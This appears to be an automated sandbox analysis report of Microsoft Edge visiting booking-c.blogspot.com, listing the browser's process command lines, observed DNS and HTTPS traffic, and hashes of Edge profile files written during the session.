"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4820 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | booking-c.blogspot.com | udp |
| GB | 142.250.187.225:443 | booking-c.blogspot.com | tcp |
| GB | 142.250.187.225:443 | booking-c.blogspot.com | tcp |
| GB | 142.250.187.225:443 | booking-c.blogspot.com | tcp |
| US | 8.8.8.8:53 | resources.blogblog.com | udp |
| US | 8.8.8.8:53 | www.blogger.com | udp |
| GB | 216.58.201.105:443 | www.blogger.com | tcp |
| GB | 216.58.201.105:443 | www.blogger.com | tcp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.google-analytics.com | udp |
| US | 8.8.8.8:53 | themes.googleusercontent.com | udp |
| GB | 172.217.169.72:443 | ssl.google-analytics.com | tcp |
| GB | 216.58.201.97:443 | themes.googleusercontent.com | tcp |
| GB | 172.217.169.72:443 | ssl.google-analytics.com | udp |
| GB | 142.250.187.225:443 | booking-c.blogspot.com | udp |
| US | 8.8.8.8:53 | 105.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d5564ccbd62bac229941d2812fc4bfba |
| SHA1 | 0483f8496225a0f2ca0d2151fab40e8f4f61ab6d |
| SHA256 | d259ff04090cbde3b87a54554d6e2b8a33ba81e9483acbbe3e6bad15cbde4921 |
| SHA512 | 300cda7933e8af577bdc1b20e6d4279d1e418cdb0571c928b1568bfea3c231ba632ccb67313ae73ddeae5586d85db95caffaedd23e973d437f8496a8c5a15025 |
\??\pipe\LOCAL\crashpad_932_FNZWUEIVLJUCRGTU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3157bf221ab927ed14c6e985eca38219 |
| SHA1 | f366af1045740b534c4f40dad21e93dc4e08c2a5 |
| SHA256 | 1f1812d99435c0dbd41ddf340e6c7fbc09264135c2469deccdfc1356b69074bc |
| SHA512 | e446104cd9708cc8281aa14a7b3d269b391c8562655d8ca219b7bc827cff80022761b8d7d1079a24512002346e4cfdb914270f0521c21435c87483f1ddcecba2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2272c8e09f389b825e661594aabadf3c |
| SHA1 | 4a7535dc7d9f833b7036e840c2639b46a9ff0cd3 |
| SHA256 | fd8050fedb8baa87b3fcb5afb7f1077ba26ff82c5dd32345bc13b52de8bda66a |
| SHA512 | 0c285b87b28e264b20d9436f9631c4167040994fb15b6668d5bf05882a32260c8d59b85673f95de62ef95c608542b675dab239a4b28babb13eb40cd0347d74f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8fc529ae6476751c40ffe11c2bc19d3a |
| SHA1 | 139c4f034d1e46e883abe6916212ada7da9ea091 |
| SHA256 | dac9b190a0441e8e8447940f8032b40dec8a24ae51065e6bd63912f9a4024d71 |
| SHA512 | 736a0ee6f83a862cbfd3d14bf91bebe3d22fd8a2b16afc8e55ff35508a78b9f0a520d025bd3ddda723b42a6b1895d19ae9050eff2f7af0046faacad5bc54fa81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 1d1c7c7f0b54eb8ba4177f9e91af9dce |
| SHA1 | 2b0f0ceb9a374fec8258679c2a039fbce4aff396 |
| SHA256 | 555c13933eae4e0b0e992713ed8118e2980442f89fbdfb06d3914b607edbbb18 |
| SHA512 | 4c8930fe2c805c54c0076408aba3fbfb08c24566fba9f6a409b5b1308d39c7b26c96717d43223632f1f71d2e9e68a01b43a60031be8f1ca7a541fe0f56f4d9f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0dad66b7c913daee80c67f7aa254a3c3 |
| SHA1 | d171583bb38b0a47c765c4acb95d2c1f8c316b51 |
| SHA256 | 50bc86bbcea12efdce5ab2b232d4c42e752f3b5384f63bdbff89804093a38c83 |
| SHA512 | 5e85090ee68b36c8d4b04ec0d2edb8baff28d43eb625bf9baaa1feb56559b3bacfbca0e6dc6221d603f7e8a98feace0a528c8ff71abeb5759c46817b7916d850 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | cac8248d87ccb0a581b69a3123a86bfd |
| SHA1 | 976db3e7214c2b36693a1ebb554e3f2580a6e7ba |
| SHA256 | 828b1d5fdeeb6c141ba3a6924954dc437e039fd2deee9099dd03188d04871c9a |
| SHA512 | a6cc29f3257f179d6ced875825f7800ca55dec6df72b76c95502ef06f8408235ef14f60aaea3f39180eb8864849876a63e3bcdbea22ddb8edfa0fba7d2d5cd61 |